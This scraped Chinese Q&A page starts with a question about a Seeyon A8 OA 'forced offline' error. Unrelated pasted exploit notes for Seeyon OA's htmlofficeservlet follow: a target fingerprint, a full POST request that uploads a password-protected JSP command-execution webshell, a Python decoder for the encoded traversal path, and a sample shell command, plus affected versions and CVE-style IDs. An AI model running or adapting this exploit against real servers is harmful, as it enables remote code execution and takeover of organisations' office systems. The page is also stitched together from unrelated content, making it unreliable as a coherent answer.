请问致远A8 OA协同办公软件打开文件时显示:被迫下线 与服务器失去联系,是啥原因?
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了请问致远A8 OA协同办公软件打开文件时显示:被迫下线 与服务器失去联系,是啥原因?相关的知识,希望对你有一定的参考价值。
参考技术A 是有用户数限制的,或者服务器端没有安装好 参考技术B 打开ie浏览器的internet选项页面,在“高级”栏位中 点击“重置”按钮可以解决 被迫下线 问题 参考技术C 是不是加密狗松动了,找不到企业信息了漏洞复现-致远OA
致远OA
致远A8-V5协同管理软件V6.1sp1
致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件V7.1
漏洞指纹 fofa app=“用友-致远OA” “seeyon”
https://www.cnblogs.com/flashine/articles/14325665.html 复现
https://www.cnblogs.com/nul1/p/12803555.html
/seeyon/htmlofficeservlet
EXP
POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>6e4f045d4b8506bf492ada7e3390d7ce
响应
DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\\\..\\\\..\\\\ApacheJetspeed\\\\webapps\\\\seeyon\\\\test123456.jsp
import base64
a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out = ""
c = input("\\n1.加密 2.解密 0.退出\\n\\n请选择处理方式:")
while c != 0:
out = ""
if c == 1:
str = raw_input("\\n请输入要处理的字符串:")
str = base64.b64encode(str)
for i in str:
out += b[a.index(i)]
print("\\n处理结果为:"+out)
elif c == 2:
str = raw_input("\\n请输入要处理的字符串:")
for i in str:
out += a[b.index(i)]
out = base64.b64decode(out)
print("\\n处理结果为:"+out)
else:
print("\\n输入有误!!只能输入“1”和“2”,请重试!")
c = input("\\n1.加密 2.解密 0.退出\\n\\n请选择处理方式:")
HTTP/1.1 200 OK
Date: Sat, 16 Apr 2022 13:01:42 GMT
Connection: close
Server: Seeyon-Server/1.0
Content-Length: 1116
DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLKhqUwAqUKEwfuXwiC6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>
http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/
https://blog.csdn.net/xd_2021/article/details/122232463
致远OA 登录框处存在Log4j2漏洞
请输入要处理的字符串:qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
b'..\\\\..\\\\..\\\\ApacheJetspeed\\\\webapps\\\\seeyon\\\\test123456.jsp'
test123456.jsp?pwd=asasd3344&cmd=ipconfig
致远A8-V5协同管理软件 V6.1SP2
v6.1 sp2
.A6 V7.1SP1
上传漏洞
https://www.cnblogs.com/bonelee/p/15160660.html
https://blog.csdn.net/weixin_43227251/article/details/115616761
致远 A8+ V7.1
公开日期:2021-06-03
漏洞编号:CNVD-2021-32773
危害等级:高危
漏洞描述:致远A8+协同管理软件存在命令执行漏洞
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp1
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp2
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp3
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.1
远程任意文件上传文件上传漏洞
致远A8-V5协同管理软件 V6.1sp1
致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件V7.1
A6 员工敏感信息泄露https://blog.csdn.net/qq_42660246/article/details/116176625
http://www.javashuo.com/article/p-ejsncfjj-nu.html
以上是关于请问致远A8 OA协同办公软件打开文件时显示:被迫下线 与服务器失去联系,是啥原因?的主要内容,如果未能解决你的问题,请参考以下文章
oa系统, 关联软件不正确,说是WPS和OFFICE不兼容,请问如何解决?